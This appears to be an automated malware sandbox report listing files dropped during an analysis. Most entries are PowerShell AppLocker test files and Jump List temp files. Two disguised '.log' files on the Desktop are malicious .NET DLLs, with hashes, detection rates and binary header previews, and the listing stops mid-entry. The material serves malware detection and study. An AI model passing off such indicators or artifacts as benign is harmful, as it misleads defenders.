                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4q4lt3q4.mzj.psm1

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ascppddn.aie.ps1

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gwje5p4c.dxn.psm1

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hoeyugf4.h32.psm1

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_itdjawgd.iqa.ps1

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jvxw3c0k.if4.ps1

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mcek3gik.5ef.ps1

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o5sxwk5k.jtq.ps1

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tahprqrw.cqx.psm1

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u53g12ok.mi0.psm1

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zj4ayhfi.rvq.psm1

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zn4n3b0x.rjr.ps1

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zq2oefsc.hhz.psm1

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IN5DJEZQ6859GQHAUT4D.temp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6221
                                                                                                                                                                                                  Entropy (8bit):3.7268314866273835
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:McoG3Cep5WkvhkvCCt2py5LwHZpy5LwHC:Mcoq3C2g5LGg5LX
                                                                                                                                                                                                  MD5:9490228CE0E07B04BBEB51689EB50F9C
                                                                                                                                                                                                  SHA1:8EDBBD3A3CF4223F3E27486FBE1FE40CA15CA8C3
                                                                                                                                                                                                  SHA-256:9B0282835EF5C2CB19966AD835ACB68FEAC732ABB455D6A1E645BF8B6FCCBDF3
                                                                                                                                                                                                  SHA-512:47FCF3141C9293A862E0B8773503D79667968D581B3EA596009CAF9F6B7A800883C5D586BBEE7A482FE1C233DF6D3F0E5F8E04DD1EF0470D8449E2372F8EDBC9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:...................................FL..................F.".. ...-/.v....)..@....z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v.......I...mh.I......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y<............................%..A.p.p.D.a.t.a...B.V.1......Y:...Roaming.@......CW.^.Y:............................W..R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.Y=...........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWP`..Windows.@......CW.^.Y=...........................,...W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^.Y=.....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^.Y=.....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^.Y=...........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^DW.V....Q...........

                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZFNO4WRIKWMQ2LRA1KW4.temp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6221
                                                                                                                                                                                                  Entropy (8bit):3.7319723140970913
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:hcp33CxH5WkvhkvCCt2py5LwHZpy5LwHC:hcpyZC2g5LGg5LX
                                                                                                                                                                                                  MD5:5537B69E98DC0F6A0091A0B126967B6F
                                                                                                                                                                                                  SHA1:E033F6D85F26322176FBA66284B4C04CD35473E1
                                                                                                                                                                                                  SHA-256:6EBD1EF364F7DCBA0CE3FCAAE2ECA0BB6AB6CB3277A1BFDC62DDEF927124B81F
                                                                                                                                                                                                  SHA-512:DCC79D54028E2002E9FDEF0C61E0B97F10D596BEDA50D5F04E35A895383CCF535E8CF8BF862F0424369C6527914F8BBE7E253BA03DAD0C5D346B6E50FB5C2C1C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:...................................FL..................F.".. ...-/.v....)..@....z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v.......I..>~..I......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y<............................%..A.p.p.D.a.t.a...B.V.1......Y:...Roaming.@......CW.^.Y:............................W..R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.Y=...........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWP`..Windows.@......CW.^DWP`..........................,...W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^DW.V....Q...........

                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6221
                                                                                                                                                                                                  Entropy (8bit):3.7319723140970913
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:hcp33CxH5WkvhkvCCt2py5LwHZpy5LwHC:hcpyZC2g5LGg5LX
                                                                                                                                                                                                  MD5:5537B69E98DC0F6A0091A0B126967B6F
                                                                                                                                                                                                  SHA1:E033F6D85F26322176FBA66284B4C04CD35473E1
                                                                                                                                                                                                  SHA-256:6EBD1EF364F7DCBA0CE3FCAAE2ECA0BB6AB6CB3277A1BFDC62DDEF927124B81F
                                                                                                                                                                                                  SHA-512:DCC79D54028E2002E9FDEF0C61E0B97F10D596BEDA50D5F04E35A895383CCF535E8CF8BF862F0424369C6527914F8BBE7E253BA03DAD0C5D346B6E50FB5C2C1C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:...................................FL..................F.".. ...-/.v....)..@....z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v.......I..>~..I......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y<............................%..A.p.p.D.a.t.a...B.V.1......Y:...Roaming.@......CW.^.Y:............................W..R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.Y=...........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWP`..Windows.@......CW.^DWP`..........................,...W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^DW.V....Q...........

                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF41c22a.TMP (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6221
                                                                                                                                                                                                  Entropy (8bit):3.7319723140970913
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:hcp33CxH5WkvhkvCCt2py5LwHZpy5LwHC:hcpyZC2g5LGg5LX
                                                                                                                                                                                                  MD5:5537B69E98DC0F6A0091A0B126967B6F
                                                                                                                                                                                                  SHA1:E033F6D85F26322176FBA66284B4C04CD35473E1
                                                                                                                                                                                                  SHA-256:6EBD1EF364F7DCBA0CE3FCAAE2ECA0BB6AB6CB3277A1BFDC62DDEF927124B81F
                                                                                                                                                                                                  SHA-512:DCC79D54028E2002E9FDEF0C61E0B97F10D596BEDA50D5F04E35A895383CCF535E8CF8BF862F0424369C6527914F8BBE7E253BA03DAD0C5D346B6E50FB5C2C1C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:...................................FL..................F.".. ...-/.v....)..@....z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v.......I..>~..I......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y<............................%..A.p.p.D.a.t.a...B.V.1......Y:...Roaming.@......CW.^.Y:............................W..R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.Y=...........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWP`..Windows.@......CW.^DWP`..........................,...W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^DW.V....Q...........

                                                                                                                                                                                                  C:\Users\user\Desktop\Aepdvrho.log

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Bridgeprovider.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):38912
                                                                                                                                                                                                  Entropy (8bit):5.679286635687991
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                                                                                                                                                  MD5:9E910782CA3E88B3F87826609A21A54E
                                                                                                                                                                                                  SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                                                                                                                                                  SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                                                                                                                                                  SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                  • Filename: gorkmTnChA.exe, Detection: malicious, Browse
                                                                                                                                                                                                  • Filename: A5EbyKyjhV.exe, Detection: malicious, Browse
                                                                                                                                                                                                  • Filename: qNdO4D18CF.exe, Detection: malicious, Browse
                                                                                                                                                                                                  • Filename: iN1fhAtzW2.exe, Detection: malicious, Browse
                                                                                                                                                                                                  • Filename: based.exe, Detection: malicious, Browse
                                                                                                                                                                                                  • Filename: RustChecker.exe, Detection: malicious, Browse
                                                                                                                                                                                                  • Filename: main.exe, Detection: malicious, Browse
                                                                                                                                                                                                  • Filename: file_1443.exe, Detection: malicious, Browse
                                                                                                                                                                                                  • Filename: lsass.exe, Detection: malicious, Browse
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\Desktop\AtXEfMql.log

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Bridgeprovider.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):33792
                                                                                                                                                                                                  Entropy (8bit):5.541771649974822
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                                                                                                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                                                                                                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                                                                                                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                                                                                                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 38%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\Desktop\DmmmRJbk.log

                                                                                                                                                                                                  Download File
